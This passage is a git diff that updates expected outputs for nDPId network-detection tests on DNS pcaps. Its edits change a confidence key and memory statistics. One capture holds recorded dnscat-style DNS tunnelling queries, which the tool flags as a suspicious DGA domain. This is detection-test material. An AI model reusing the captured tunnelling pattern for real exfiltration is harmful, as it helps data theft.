00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1572783663269,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572783663269,"pkt":"CAAnjau+uCfrK5DxCABFAAA8cqUAAHcG\/qUICAgIwKgBuQNV47LuO0vYVUT7+KAS6yDKxQAAAgQFZAQCCAqOOwAQKi+VEwEDAwg="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1572783663269,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1572783663269,"pkt":"uCfrK5DxCAAnjau+CABFAAA0w6hAAEAGpKrAqAG5CAgICOOyA1VVRPv47jtL2YAQAfbSlwAAAQEICiovlTaOOwAQ"} -01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1572783663234,"flow_last_seen":1572783663269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1572783663269,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"4fa5e77b91a47e7cdcf5a5e6d25f8449","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01630{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1572783663234,"flow_last_seen":1572783663319,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3069,"flow_tot_l4_payload_len":3267,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":1572783663319,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"4fa5e77b91a47e7cdcf5a5e6d25f8449","ja3s":"2b341b88c742e940cfb485ce7d93dde7","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"BE:73:46:2A:2E:FB:A9:E9:42:D0:71:10:1B:8C:BF:44:6A:5D:AD:53"}} -01043{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1572783663234,"flow_last_seen":1572783666246,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3069,"flow_tot_l4_payload_len":4269,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1572783666246,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1572783663234,"flow_last_seen":1572783663269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1572783663269,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"4fa5e77b91a47e7cdcf5a5e6d25f8449","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01630{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1572783663234,"flow_last_seen":1572783663319,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3069,"flow_tot_l4_payload_len":3267,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":1572783663319,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"4fa5e77b91a47e7cdcf5a5e6d25f8449","ja3s":"2b341b88c742e940cfb485ce7d93dde7","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"BE:73:46:2A:2E:FB:A9:E9:42:D0:71:10:1B:8C:BF:44:6A:5D:AD:53"}} +01043{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1572783663234,"flow_last_seen":1572783666246,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3069,"flow_tot_l4_payload_len":4269,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1572783666246,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":24,"source":"dns_dot.pcap","alias":"nDPId-test","packets-captured":24,"packets-processed":24,"total-skipped-flows":0,"total-l4-payload-len":4269,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1572783666246} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 24/24 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5876425 bytes -~~ total memory freed........: 5876425 bytes -~~ total allocations/frees...: 118155/118155 +~~ total memory allocated....: 6010059 bytes +~~ total memory freed........: 6010059 bytes +~~ total allocations/frees...: 120917/120917 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 1635 chars diff --git a/test/results/dns_exfiltration.pcap.out b/test/results/dns_exfiltration.pcap.out index 3d503c98f..cecfa9b21 100644 --- a/test/results/dns_exfiltration.pcap.out +++ b/test/results/dns_exfiltration.pcap.out @@ -2,11 +2,11 @@ 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dns_exfiltration.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1580978146717} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1580978146717,"flow_last_seen":1580978146717,"flow_idle_time":200000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1580978146717,"l3_proto":"ip4","src_ip":"192.168.220.56","dst_ip":"192.168.203.167","src_port":56373,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1580978146717,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1580978146717,"pkt":"qqru7hERjNzURr7ECABFAADJegRAAD8RAADAqNw4wKjLp9w1ADUAtSn4OR0BAAABAAAAAAAABmRuc2NhdDw1NDZiMDNmNTAwMDAwMDAwMDBhNjAyM2VkNGRmMTg0ZDZhYzVjMjYyOGI0NzcxNGZkZWU1ODRmZWQ3Mzk8NWEwM2I1YjFlMWFhOGY4ZmRiMWJiZThkNWUwNDk1MjE0MWY3ZDRmODJjN2UzYjA2ZGNjOGI4N2ZhZDdhGjE5ZTRkMDk4ZGM4YzYxOGY4ZDgxY2ZlYjAyAAAPAAE="} -00979{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1580978146717,"flow_last_seen":1580978146717,"flow_idle_time":200000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1580978146717,"l3_proto":"ip4","src_ip":"192.168.220.56","dst_ip":"192.168.203.167","src_port":56373,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e1aa8f8fdb1bbe8d5e04952141f7d4f82c7e3b06dcc8b87fad7a.19e4d098dc8c618f8d81cfeb02","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00979{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1580978146717,"flow_last_seen":1580978146717,"flow_idle_time":200000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1580978146717,"l3_proto":"ip4","src_ip":"192.168.220.56","dst_ip":"192.168.203.167","src_port":56373,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e1aa8f8fdb1bbe8d5e04952141f7d4f82c7e3b06dcc8b87fad7a.19e4d098dc8c618f8d81cfeb02","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00904{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1580978146888,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1580978146888,"pkt":"jNzURr7Eqqru7hERCABFAAF0PC1AAD8R1RrAqMunwKjcOAA13DUBYD3xOR2BgAABAAEAAAAABmRuc2NhdDw1NDZiMDNmNTAwMDAwMDAwMDBhNjAyM2VkNGRmMTg0ZDZhYzVjMjYyOGI0NzcxNGZkZWU1ODRmZWQ3Mzk8NWEwM2I1YjFlMWFhOGY4ZmRiMWJiZThkNWUwNDk1MjE0MWY3ZDRmODJjN2UzYjA2ZGNjOGI4N2ZhZDdhGjE5ZTRkMDk4ZGM4YzYxOGY4ZDgxY2ZlYjAyAAAPAAHADAAPAAEAAAA8AJ8ACgZkbnNjYXQ\/MjAxZjAzZjUwMDAwMDAwMDAwNzEzYjkyNzFmMDExZGM3NjQyM2RhYjM5MmMzMmMxOGJmYzk2YjZkMjY5NWEyPzZhOTExYzk0NDcyZjU5NDA5YTVmNTI2MDEzZTc2MDE5MzY2YTA3NzkyOWUzNDgwZmJlNmQ3YzRlZGE2ZjkwOBRmMmJjOTlhNjAxZTFhODIyMTMzNgA="} -01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1580978146717,"flow_last_seen":1580978146888,"flow_idle_time":200000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1580978146888,"l3_proto":"ip4","src_ip":"192.168.220.56","dst_ip":"192.168.203.167","src_port":56373,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e1aa8f8fdb1bbe8d5e04952141f7d4f82c7e3b06dcc8b87fad7a.19e4d098dc8c618f8d81cfeb02","num_queries":1,"num_answers":1,"reply_code":0,"query_type":15,"rsp_type":15,"rsp_addr":"0.0.0.0"}} +01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1580978146717,"flow_last_seen":1580978146888,"flow_idle_time":200000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1580978146888,"l3_proto":"ip4","src_ip":"192.168.220.56","dst_ip":"192.168.203.167","src_port":56373,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e1aa8f8fdb1bbe8d5e04952141f7d4f82c7e3b06dcc8b87fad7a.19e4d098dc8c618f8d81cfeb02","num_queries":1,"num_answers":1,"reply_code":0,"query_type":15,"rsp_type":15,"rsp_addr":"0.0.0.0"}} 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1580978147753,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1580978147753,"pkt":"qqru7hERjNzURr7ECABFAACYekZAAD8RAADAqNw4wKjLp9w1ADUAhCnHfRoBAAABAAAAAAAABmRuc2NhdDw5MWYwMDNmNTAwZjYxMjIxODEwYWVhMDAwMDA0ODYzYzY5MTU4MGVjYWQ2NmY2NGFjN2RkYjg3Yjg5YzcmOTIwMDgyMWU1MjdkNGUxNzYzMjUzYzI1ZTI5N2UyYWE0MTEzZDAAAAUAAQ=="} -00936{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":300,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":300,"flow_first_seen":1580978146717,"flow_last_seen":1580978206707,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":60945,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1580978206707,"l3_proto":"ip4","src_ip":"192.168.220.56","dst_ip":"192.168.203.167","src_port":56373,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00936{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":300,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":300,"flow_first_seen":1580978146717,"flow_last_seen":1580978206707,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":60945,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1580978206707,"l3_proto":"ip4","src_ip":"192.168.220.56","dst_ip":"192.168.203.167","src_port":56373,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":300,"source":"dns_exfiltration.pcap","alias":"nDPId-test","packets-captured":300,"packets-processed":300,"total-skipped-flows":0,"total-l4-payload-len":60945,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1580978206707} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 300/300 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5878257 bytes -~~ total memory freed........: 5878257 bytes -~~ total allocations/frees...: 118416/118416 +~~ total memory allocated....: 6011891 bytes +~~ total memory freed........: 6011891 bytes +~~ total allocations/frees...: 121178/121178 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 472 chars ~~ json string max len.......: 1102 chars diff --git a/test/results/dns_fragmented.pcap.out b/test/results/dns_fragmented.pcap.out index df5f7bd26..874b3f916 100644 --- a/test/results/dns_fragmented.pcap.out +++ b/test/results/dns_fragmented.pcap.out @@ -2,149 +2,149 @@ 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dns_fragmented.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1558968008021} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968008021,"flow_last_seen":1558968008021,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1558968008021,"l3_proto":"ip4","src_ip":"172.217.40.76","dst_ip":"193.24.227.238","src_port":56680,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1558968008021,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1558968008021,"pkt":"AAwpil3XAIac51UUCABFAABE5WoAAG8R7BGs2ShMwRjj7t1oADUAMAwz1D8AEAABAAAAAAABCHdlYmVybGFiAmRlAAAwAAEAACkQAAAAgAAAAA=="} -00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968008021,"flow_last_seen":1558968008021,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1558968008021,"l3_proto":"ip4","src_ip":"172.217.40.76","dst_ip":"193.24.227.238","src_port":56680,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968008021,"flow_last_seen":1558968008021,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1558968008021,"l3_proto":"ip4","src_ip":"172.217.40.76","dst_ip":"193.24.227.238","src_port":56680,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 02439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1558968008021,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1558968008021,"pkt":"AIac51UUAAwpil3XCABFAAXc0P4gAEARCebBGOPurNkoTAA13WgGrrRj1D+EEAABAAQAAAABCHdlYmVybGFiAmRlAAAwAAHADAAwAAEAAAA8AggBAQMKAwEAAd3v\/e0irXYKOwtYEB3VPe7z99qvi5le9\/y1XXyplp5y\/5xaqrm\/relG8pgx8GsNW2IgviJKAJ6UiU45ERKoH+fz2qf2SUFHFWwkweiWyLZ4EZHhowviCEx94P4OswNKXmdYHe38rlHPa+3OypW9gYfR9lhCKK3neCPq8\/aFFsTTI7dQ+Q2kERWiCMCybl4WOwsBo\/RlnPM4yufMKIlABiM5NWQPNmI6jYzAYpYoyUhd9HnnIIDlNQ89HpXQdFmysMraXYb7qDOoOEiOodttKH0y\/vtJ2SRU05RF4AEumacIUzAi5LL2cMQxC7t7rlDI4X42NRfOLAqGuOeclFjzqz3OdAJWeg\/AAnSbb02AGCkQ370TX1hWveAXt6xpPWOLgHXSLIF\/lz+wl+Dm8ZNWDnn5zEJuEj3xova1g8zmRXJOmqA6VhGqewxF8c+yKeNEOHz4X4\/RLmWHIuEbvboP00Dk5A9bhyZGVsytOJg+NwhFQtvBWLmD82FFtfSt2vmbFFNwAZOnRZWJOG9L7TFcGIm1OEULmohUyFLsBGMXDFOu1k0o6pqm495tsBuMyJNpfdQoPwOkUpsKi6jmNq6vRjvvNiJbcFylTQrqHGTGuOopuUsBbUXj\/nOr4I6j42k6GDIuTyLDkaVrdrxXmGnfNnStdqWmvHXo\/YFwdls9bcT7wAwAMAABAAAAPAEIAQADCgMBAAHQVNwo8VCsO0nmM2u3Mcqv14N851ULDM7hf1Hi2ooDrm7SR4cYS\/ptdvSMUJEyqPCUSF3Clw\/mlYs7YppfPvATwlxTT37RaXRQswUTRh4\/3GtYPxZXJOr+Wr2nwf4Rqm1imNixBim+ZLWFho\/CQdJqyhqg2VT8ongtHWFb9Nojmjr1IXZe0LYFcm0d1eoB5YaBtAcRvhm41KfjcjwpW7jDiMH5W1RgefeOj8kBkIJxjV9i9TB7pjmmAvw91J8s0GTTJqo\/ORsAzT8BHg3y6usJtQVH8ezMMHBFbjtgdGJlMoj4kn1KBk8Jtj9ZxjTIZWIo922PVb8sQqj0JytLOU69wAwALgABAAAAPAIfADAKAgAAADxdChURXOJ+MzN7CHdlYmVybGFiAmRlAB+yP4V\/njTX1ZrAUX52Q4ppNzTYQFwUb\/fZ7UyQYLNxrrstLuUEImGhNwZoGn47E0jCxJscYiApT\/lYiL2L1ySUl4RKqHIjPNuYuibs67t5ZabkYsahlYEA\/lOcM3eIQx9pu5Og7p1d2yBSUETOBiGw2mFf2+ESni6Ue4XPXEEYzAhiMRhuYOJAy8gBqoPjkRBcJfWJSQLCsK1uYySkTZfbAzgJeVM0nXd6azgG0BhRE+LeaO6r